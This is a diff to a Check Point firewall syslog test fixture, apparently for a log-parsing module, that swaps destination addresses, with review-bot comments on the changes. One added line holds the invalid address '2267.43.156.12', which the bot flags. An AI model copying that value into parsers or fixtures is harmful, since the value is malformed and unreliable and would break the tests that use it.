ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104db,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; 
dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T20:28:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104e2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] +<134>1 2020-03-29T20:28:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104e2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] <134>1 2020-03-29T20:28:37Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104f7,0x0,0x6401a8c0,0x108620ab}"; 
origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"] <134>1 2020-03-29T20:28:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104f7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57621"; service:"57621"; src:"192.168.1.94"] <134>1 2020-03-29T20:28:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104f9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"] 
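Review bot: `dst:"2267.43.156.12"` on the added line is not a parseable IPv4 address, so this event will either fail an `ip` conversion in the pipeline or be rejected at index time once `destination.ip` is mapped as `ip`, which silently changes what the fixture verifies. The replaced value `224.0.0.1` is a multicast address with no privacy concern; either keep it or use an RFC 5737 address such as `dst:"192.0.2.12"`. Whichever is chosen, the expected-output file for this module must be regenerated to match.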
@@ -5191,8 +5191,8 @@ <134>1 2020-03-29T20:39:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81079f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T20:40:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8107a1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T20:40:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8107a3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56484"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T20:40:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8107a3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43091"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T20:40:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8107ad,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585514413"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56510"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T20:40:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8107a3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43091"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T20:40:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8107ad,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585514413"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56510"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T20:40:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8107ad,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54213"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T20:40:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8107ad,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41225"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T20:40:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8107ad,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; 
s_port:"50104"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10469"; xlatesrc:"0.0.0.0"] 
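Review bot: `175.16.199.1`, which replaces `8.8.8.8` on both added lines, is an ordinary globally routable address rather than one of the RFC 5737 documentation ranges, so the fixture still points at a real third-party network, just a different one. If the choice is deliberate (Elastic fixtures commonly use 175.16.199.0/24 because, as far as I know, the bundled GeoIP test database resolves it), a one-line note in the PR description would spare the next reader the question; otherwise `192.0.2.1` or `203.0.113.1` achieves the anonymisation without that side effect. Either way the `destination.ip`/`related.ip` values in the module's expected-output fixture have to be updated alongside these lines.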
@@ -5400,8 +5400,8 @@ <134>1 2020-03-29T21:10:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810ea9,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32856"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T21:10:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810ea9,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37412"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10489"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T21:10:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810eb6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32902"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:10:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810eb6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45780"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:10:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810ec0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516224"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; 
s_port:"42445"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:10:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810eb6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45780"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:10:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810ec0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516224"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42445"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T21:10:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810ec0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34375"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T21:10:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810ec0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52196"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T21:10:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810ec0,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; 
s_port:"50810"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10490"; xlatesrc:"0.0.0.0"] 
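Review bot: The substitution of `8.8.8.8` with `175.16.199.1` on the two added lines swaps one real, routable address for another; it is not a TEST-NET address, so it does not by itself remove references to live infrastructure from the fixture. If the address was picked so that GeoIP enrichment in the expected output resolves deterministically, saying so in the commit message would make the intent clear; if plain anonymisation was the goal, an RFC 5737 address such as `203.0.113.1` is the conventional choice. The corresponding expected-output file for this module presumably needs the same change.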
@@ -5466,16 +5466,16 @@ <134>1 2020-03-29T21:13:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810f92,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53044"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T21:13:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810f92,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37540"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10511"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T21:13:55Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e810f95,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; 
